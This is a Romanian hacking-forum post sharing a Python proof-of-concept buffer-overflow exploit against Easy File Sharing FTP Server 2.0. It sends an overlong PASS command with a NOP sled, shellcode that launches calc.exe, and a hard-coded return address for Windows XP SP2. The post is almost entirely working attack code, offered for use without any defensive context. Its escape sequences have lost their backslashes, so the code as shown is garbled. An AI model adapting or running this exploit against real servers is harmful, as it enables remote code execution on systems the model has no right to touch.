Hacking and more...
HaCkinG CulT
|
Lista Forumurilor Pe Tematici
|
Hacking and more... | Reguli | Inregistrare | Login
POZE HACKING AND MORE...
Nu sunteti logat.
|
Nou pe simpatie:
doryna_2223
 | Femeie
25 ani
Mehedinti
cauta Barbat
25 - 80 ani |
|
epic
User
 Inregistrat: acum 17 ani
Postari: 1896
|
|
Code:
#!/usr/bin/python
#Easy File Sharing FTP Server 2.0 (PASS) 0day PoC exploit
#Proof of Concept: execute calc.exe
#Bug found by h07 < >
#Tested on XP SP2 polish
#Date: 28.07.2006
#
#BUFF([PASS + 0x20]+[0x2c]+[NOP * 2571]+[0x41414141]+[rn])
#EIP = 0x41414141
host = "127.0.0.1"
port = 21
len_recv = 1024
user_name = "anonymous"
NOP_LEN = 2571
EIP = 0x77AB367B #popad pop ret (CRYPT32.DLL) XP SP2 polish
from socket import *
shellcode = ( #execute calc.exe <metasploit.com>
"x31xc9x83xe9xdbxd9xeexd9x74x24xf4x5bx81x73x13xd8"
"x22x72xe4x83xebxfcxe2xf4x24xcax34xe4xd8x22xf9xa1"
"xe4xa9x0exe1xa0x23x9dx6fx97x3axf9xbbxf8x23x99x07"
"xf6x6bxf9xd0x53x23x9cxd5x18xbbxdex60x18x56x75x25"
"x12x2fx73x26x33xd6x49xb0xfcx26x07x07x53x7dx56xe5"
"x33x44xf9xe8x93xa9x2dxf8xd9xc9xf9xf8x53x23x99x6d"
"x84x06x76x27xe9xe2x16x6fx98x12xf7x24xa0x2dxf9xa4"
"xd4xa9x02xf8x75xa9x1axecx31x29x72xe4xd8xa9x32xd0"
"xddx5ex72xe4xd8xa9x1axd8x87x13x84x84x8exc9x7fx8c"
"x28xa8x76xbbxb0xbax8cx6exd6x75x8dx03x30xccx8dx1b"
"x27x41x13x88xbbx0cx17x9cxbdx22x72xe4")
def intel_order(i):
a = chr(i % 256)
i = i >> 8
b = chr(i % 256)
i = i >> 8
c = chr(i % 256)
i = i >> 8
d = chr(i % 256)
str = "%c%c%c%c" % (a, b, c, d)
return str
s = socket(AF_INET, SOCK_STREAM)
s.connect((host, port))
print s.recv(len_recv)
buffer = "USER %srn" % (user_name)
s.send(buffer)
print s.recv(len_recv)
buffer = "PASS "
buffer += "x2c"
buffer += "x90" * (NOP_LEN - len(shellcode))
buffer += shellcode
buffer += intel_order(EIP)
buffer += "rn"
s.send(buffer)
print s.recv(len_recv)
s.close()
#EoF |
_______________________________________
:< 4 8 15 16 23 42 *execute*
TOATA LUMEA ESTE INVITATA PE NOUL FORUM!
|
|
| pus acum 17 ani |
|